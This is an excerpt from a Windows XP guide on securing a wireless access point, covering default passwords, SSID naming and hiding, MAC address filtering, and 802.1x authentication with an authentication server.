Controlling Connections to a Wireless Access Point

Controlling Connections to a Wireless Access Point
Your first line of defense in securing a wireless network is to make it more difficult for outsiders to connect to the network. That's not an easy task. The antenna in a wireless access point can broadcast its signal hundreds of feet in any direction. That's bad news if you live in a densely populated apartment complex, but even if you have no neighbors within range of the access point, you could still be vulnerable. An enthusiastic community of "drive-by" hackers has turned wireless breaking and entering into a hobby, devising booster antennas and software utilities (with colorful names like AirSnort and Network Stumbler) that allow them to sniff out the details of unprotected networks as they drive through neighborhoods or sit in public areas of an office complex.

TIP
--------------------------------------------------------------------------------

Don't let bad guys reconfigure your network

When you set up your wireless access point for the first time, be sure to change the default password that unlocks the configuration utility. This crucial precaution protects the access point (and the rest of your network) from being reconfigured by an outsider. Default passwords are notoriously easy to crack; change the password to one that's easy for you to remember but difficult for a stranger to crack. (If you need some ideas on how to create an effective password, see Creating Strong Passwords.) If your hardware supports disabling wireless administration completely, consider doing without that feature and using a direct connection—via Ethernet, USB, or a serial port—instead.

Windows XP in particular makes the process of connecting to a wireless LAN extremely easy, thanks to a feature called wireless zero configuration. Most access points automatically broadcast their presence so that client computers can connect as soon as they come in range. When you connect a wireless network adapter to a computer running Windows XP, the operating system automatically discovers the nearest access point for that network and configures the adapter to work with it. That information appears in the list of available networks, shown in Figure 16-1.


Figure 16-1. Windows XP automatically discovers available networks and connects to them automatically unless you turn on Wired Equivalent Privacy (WEP).
The network name shown in the Available Networks list is also called the Service Set Identifier, or SSID. In this example, which shows the SSID of an Agere Systems (formerly Lucent) RG-1000 Residential Gateway, the SSID is configured automatically using half of the built-in adapter's MAC address. Some manufacturers use default names for the SSID instead; in this case, a would-be intruder who knows the default name could connect to the access point without any additional work. In fact, if you live in an apartment building with thin walls and your next-door neighbor uses the same hardware as you, it's conceivable that one or both of you could inadvertently connect to the wrong network!

You can take any or all of the following three measures to prevent someone from discovering the SSID of your network and trying to connect to it:

Choose a new network name. This is a good idea if your hardware automatically assigns a default name that is identical to those used by other people with the same hardware. Whatever you do, don't use a name that identifies yourself or your business. That bit of information can encourage drive-by hackers to probe more deeply than if you just use a random alphanumeric string.
Don't broadcast your network name. If your hardware includes an option to set up the network as a "closed" system, as the Agere Systems RG-1100 does, consider enabling this option. Anyone who wants to connect to the network will need to supply the network name manually rather than having it filled in automatically by the wireless hardware and Windows XP; this precaution also frustrates wireless scanning utilities like Net Stumbler, which are unable to automatically discover the network name when you use this configuration.
Use MAC addresses to limit access. Not all access points include this option, which allows you to specify that the only wireless adapters allowed to connect to your access point are those with MAC addresses on a list you enter. If your network is small, you can easily manage the list manually. For networks that have more than five wireless computers or that guests regularly visit, the administrative burden is unacceptable. Of course, a skilled hacker can spoof a MAC address and bypass this setting, but it can still be a useful barrier to casual snoops.
If you have access to an enterprise-strength authentication server, you can configure your network so that all connection requests are forced to authenticate through that server. This option uses the 802.1x standard and Extensible Authentication Protocol (EAP). In the enterprise market, you can choose from a variety of EAP types, most of which use either a certificate or a password to authenticate the wireless client at the access point. Used with a RADIUS server and a physical device such as a smart card, this option can be extremely secure.

Support for 802.1x authentication is built into Windows XP. To access these settings, open the properties dialog box for the wireless connection and choose the Authentication tab. Figure 16-2 shows the default settings.


Figure 16-2. If your network includes an authentication server, you can greatly increase the security of a wireless network.
If your network serves a home or small business, you should not tamper with these default settings. Windows XP enables authentication by default, but this setting is used only when a suitable server is available. If your authentication server uses an MD5 challenge rather than a certificate, it is vulnerable to brute force attacks from over the network.